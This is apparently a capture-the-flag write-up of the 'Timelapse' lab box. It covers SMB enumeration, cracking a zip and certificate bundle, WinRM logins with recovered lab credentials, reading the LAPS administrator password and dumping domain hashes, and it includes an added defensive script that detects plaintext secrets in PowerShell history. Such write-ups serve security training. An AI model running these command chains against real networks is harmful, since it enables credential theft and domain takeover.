# Timelapse

## Nmap

```
sudo nmap 10.10.11.152 -Pn -p- -sS -sV

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-02 14:42:07Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
58212/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting out, we check anonymous logon with `smbmap`, where we find that the "Shares" share is readable by us.

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FH10kCDtyN0oggGxotbw0%2Fimage.png?alt=media\&token=7d67130a-4ba4-431d-a042-f2d20c816b06)

Recursively searching the share with `smbmap` reveals that LAPS may be installed in the environment, as well as the interesting file `winrm_backup.zip`.

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -r
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVIUi0EOASIVtJk5Ka2ss%2Fimage.png?alt=media\&token=4ba77ba3-0fed-4bbc-955b-e6a86e3ed2e1)

Download the file:

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -R -A .zip
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FswewfvMcKWID0I9Q0vFB%2Fimage.png?alt=media\&token=084aaec8-5453-4568-9722-227d5a942321)

As the zip file is password protected we can utilize `zip2john` to hash the file and then crack it.

```bash
/usr/sbin/zip2john 10.10.11.152-Shares_Dev_winrm_backup.zip
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOZCl0a9vnDcGGbwVFr3D%2Fimage.png?alt=media\&token=cadb00cb-73a5-4fc7-acfb-86bf4981d153)

Supplying john with the `rockyou.txt` wordlist, we find the hash is cracked quickly.

```bash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt winrmbackup.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdkHBSokLcpr6TRx0hpqQ%2Fimage.png?alt=media\&token=d1e17a64-02fb-404f-9329-88d2e70380e8)

We are left with the file `legacyy_dev_auth.pfx`. A `.pfx` file is a certificate bundle in PKCS#12 format, which can contain both a certificate and its private key.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FM1hw9qXtGN1XPAXG1S5e%2Fimage.png?alt=media\&token=54f64450-2628-459d-a779-9466c205827e)

Again, we need to hash the `.pfx` file and crack its password.

```bash
/usr/bin/pfx2john legacyy_dev_auth.pfx >> pfx.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtihvyosBOd7w92N7V9Mq%2Fimage.png?alt=media\&token=e49243ee-4d83-45d5-96c0-0ac53a950a95)

With the .pfx file we can now look at how we can connect to the target system. It is possible to connect over WinRM by providing a public certificate and a valid private key both of which can be extracted from .pfx files.

I used the following link for guidance on how to extract this information:

**URL:** <https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file>

```bash
# Extract the private key
openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key]

# Extract the certificate
openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt]

# Decrypt the private key
openssl rsa -in [drlive.key] -out [drlive-decrypted.key]
```

**Note:** You may need to connect to a TCP OpenVPN configuration for the following to connect successfully.

```bash
evil-winrm -i '10.10.11.152' -c 'drlive.crt' -k 'drlive-decrypted.key' -S -r 'timelapse.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtcPb7OCASHB89PGa0JeI%2Fimage.png?alt=media\&token=b7d5f5ae-4ca7-4528-aaac-43b86655ba39)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7jOWgeXePVadUiQZBnFs%2Fimage.png?alt=media\&token=3687f3de-972d-4588-91d0-6c1a368a73a7)

From here we look into the `ConsoleHost_History.txt` file (the PowerShell console history for the user) and find credential information contained within.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNhCO2XrWi7terrg2Zy6m%2Fimage.png?alt=media\&token=d0492547-cbce-4a1c-bdba-cf128ac6b467)

We now have the credentials for `svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV`

```bash
evil-winrm -i '10.10.11.152' -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986
```
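The credentials above were recovered from a PowerShell console history file left on the host. As an added defensive example (not part of the original writeup), the following Python script scans a `ConsoleHost_History.txt`-style file for lines that embed secrets and reports them with the secret masked, so it can be run as a hygiene check before a host or user profile is backed up or shared. The sample history and every account and secret value in it are constructed for this example, not taken from the target.

```python
"""Scan PowerShell console history for credentials left in plaintext.

Added example: flags lines in a ConsoleHost_History.txt-style file that embed
secrets (ConvertTo-SecureString '...' -AsPlainText, net use ... /user:X <pw>,
-Password <literal>) and reports them with the secret masked.
"""
import re
import sys
from pathlib import Path
from typing import Iterable, List, NamedTuple

# Constructed sample history (NOT the file from the target host).
SAMPLE_HISTORY = """whoami
ipconfig
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Example-Only-Secret-1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('timelapse\\svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
Get-ChildItem C:\\Users
net use \\\\fileserver\\share /user:timelapse\\backup_example Example-Only-Secret-2
exit
"""


class Finding(NamedTuple):
    line_no: int   # 1-based line number in the history file
    rule: str      # name of the pattern that matched
    redacted: str  # the offending line with the secret masked


# Each rule is (name, pattern); the named group "secret" is what gets masked.
# Group numbers: "secret" is group 1, the quote character (if any) is group 2.
RULES = [
    # $p = ConvertTo-SecureString 'hunter2' -AsPlainText -Force
    ("plaintext-securestring",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?"
                r"(?P<secret>(['\"]).+?\2)(?=.*-AsPlainText)", re.I)),
    # net use \\srv\share /user:DOMAIN\user hunter2   (password given inline)
    ("net-use-password",
     re.compile(r"\bnet\s+use\b.*/user:\S+\s+(?P<secret>(?!/)\S+)", re.I)),
    # -Password 'hunter2'  (a literal; a $variable is not flagged)
    ("literal-password-parameter",
     re.compile(r"-Password\s+(?P<secret>(['\"])[^'\"]+\2|(?!\$)\S+)", re.I)),
]


def scan_lines(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per line that matches any rule, secret masked."""
    findings: List[Finding] = []
    for no, raw in enumerate(lines, start=1):
        line = raw.rstrip("\r\n")
        for name, pat in RULES:
            m = pat.search(line)
            if m:
                masked = line[:m.start("secret")] + "<redacted>" + line[m.end("secret"):]
                findings.append(Finding(no, name, masked))
                break  # one finding per line is enough for a report
    return findings


def scan_text(text: str) -> List[Finding]:
    return scan_lines(text.splitlines())


def scan_file(path: Path) -> List[Finding]:
    # History files are small; errors="replace" tolerates odd encodings.
    return scan_text(path.read_text(encoding="utf-8", errors="replace"))


def main(argv: List[str]) -> int:
    # Usage: python scan_history.py [path-to-ConsoleHost_History.txt]
    # With no argument the constructed sample is scanned.
    findings = scan_file(Path(argv[1])) if len(argv) > 1 else scan_text(SAMPLE_HISTORY)
    for f in findings:
        print(f"line {f.line_no}: [{f.rule}] {f.redacted}")
    print(f"{len(findings)} credential-bearing line(s) found")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run against the sample it reports lines 4 and 8 only; the `PSCredential` construction on line 5 is not flagged because the secret there is already a variable, and `-port 5986` does not trip the password rule because that rule requires the literal parameter name `-Password`. A non-zero exit code makes the script usable as a gate in a backup or provisioning job.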

Viewing the group memberships for our current user we see we are a member of "LAPS Readers".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiU5kV3htDZX7tcSwssh3%2Fimage.png?alt=media\&token=adaa93cd-1202-4db0-bb2e-c02ad65cd348)

Knowing this, we can run the following PowerShell command to pull the LAPS-managed local administrator password for the host DC01.

```powershell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F1y6oRsosdJ160Rqz6uSp%2Fimage.png?alt=media\&token=180f4fb1-64c6-48a6-9128-0c713a3946fe)

We are then able to use `Evil-WinRM` to authenticate against the target system with the LAPS password.

```bash
evil-winrm -i '10.10.11.152' -u 'administrator' -p '+K)HlT72oO(W6;W&402qD9LS' -S -P 5986
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fthl5RsXrkqiIL6UwvvRy%2Fimage.png?alt=media\&token=38a077dd-1efe-4f47-876f-4935636b2b9f)

Then grab the **root** flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLxOUHwaSTQYlvgbvuFAo%2Fimage.png?alt=media\&token=48a013a8-753a-4674-acef-1536379f5582)

`Crackmapexec` can also be used with these credentials to dump the `NTDS.dit` hashes from the target system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FguwpDTXRNraMzG9GV6QD%2Fimage.png?alt=media\&token=dece1079-2ca2-4c7b-836d-37231dca4010)
